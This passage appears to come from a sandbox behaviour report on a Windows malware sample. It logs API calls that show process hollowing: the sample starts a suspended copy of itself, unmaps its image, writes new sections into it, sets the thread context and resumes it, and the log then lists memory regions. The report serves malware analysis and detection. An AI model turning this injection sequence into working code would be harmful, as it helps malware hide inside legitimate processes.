hStdOutput=0xffffffff, hStdError=0xffffffff)) [0096.026] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" [0096.027] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0xf2c, dwThreadId=0xf30)) returned 1 [0096.043] VirtualFree (lpAddress=0x210000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.043] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x210000 [0096.044] GetThreadContext (in: hThread=0x74, lpContext=0x210000 | out: lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x498550, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0096.053] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0096.053] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0096.142] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0096.150] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3de15a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3de15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0096.177] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3de19a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3de19a0*, NumberOfBytesWritten=0x0) returned 0x0 [0096.219] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3eabfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3eabfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0096.249] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3ee9ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3ee9ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0096.271] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3eeffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3eeffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0096.293] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3ef01a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3ef01a0*, NumberOfBytesWritten=0x0) returned 0x0 [0096.315] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3de16ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3de16ec*, lpNumberOfBytesWritten=0x0) returned 1 [0096.316] SetThreadContext (hThread=0x74, lpContext=0x210000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0096.317] ResumeThread (hThread=0x74) returned 0x1 [0096.390] CloseHandle (hObject=0x74) returned 1 [0096.390] CloseHandle (hObject=0x78) returned 1 [0096.390] ExitProcess (uExitCode=0x0) [0096.391] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2307d0 | out: hHeap=0x230000) returned 1 Process: id = "6" image_name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" page_root = "0x4234a000" os_pid = "0xf2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xf20" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 998 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 999 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1000 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1001 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1002 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1003 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1004 start_va = 0x400000 end_va = 0x253bfff monitored = 1 entry_point = 0x498550 region_type = mapped_file name = "1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") Region: id = 1005 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1006 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1007 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1008 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1009 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1010 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1011 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1012 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1013 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1014 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1015 start_va = 0x1a0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1016 start_va = 